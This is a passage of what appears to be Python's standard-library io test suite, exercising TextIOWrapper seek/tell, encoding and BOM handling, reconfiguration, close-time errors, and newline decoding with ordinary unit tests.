def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(os_helper.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(os_helper.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(os_helper.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable(), encoding="utf-8")
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"), encoding="utf-8")
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"), encoding="utf-8")
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"), encoding="utf-8")
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="utf-8")
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="utf-8")
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO(), encoding="utf-8")
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
self.assertEqual(f.errors, "strict")
with self.open(os_helper.TESTFN, "w", encoding="utf-8", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@threading_helper.requires_working_threading()
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(os_helper.TESTFN, "w", encoding="utf-8", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with threading_helper.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(os_helper.TESTFN, encoding="utf-8") as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata), encoding="utf-8")
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig does not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "LookupError: unknown encoding: ascii"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertRaises(ValueError, t.__init__, b, encoding="utf-8", newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(os_helper.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
def test_internal_buffer_size(self):
# bpo-43260: TextIOWrapper's internal buffer should not store
# data larger than chunk size.
chunk_size = 8192 # default chunk size, updated later
class MockIO(self.MockRawIO):
def write(self, data):
if len(data) > chunk_size:
raise RuntimeError
return super().write(data)
buf = MockIO()
t = self.TextIOWrapper(buf, encoding="ascii")
chunk_size = t._CHUNK_SIZE
t.write("abc")
t.write("def")
        # default chunk size is 8192 bytes, so t doesn't write data to buf.
self.assertEqual([], buf._write_stack)
with self.assertRaises(RuntimeError):
t.write("x"*(chunk_size+1))
self.assertEqual([b"abcdef"], buf._write_stack)
t.write("ghi")
t.write("x"*chunk_size)
self.assertEqual([b"abcdef", b"ghi", b"x"*chunk_size], buf._write_stack)
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_removed_u_mode(self):
# bpo-37330: The "U" mode has been removed in Python 3.11
for mode in ("U", "rU", "r+U"):
with self.assertRaises(ValueError) as cm:
self.open(os_helper.TESTFN, mode)
self.assertIn('invalid mode', str(cm.exception))
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a', encoding="utf-8")
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
if "b" not in kwargs["mode"]:
kwargs["encoding"] = "utf-8"
f = self.open(os_helper.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
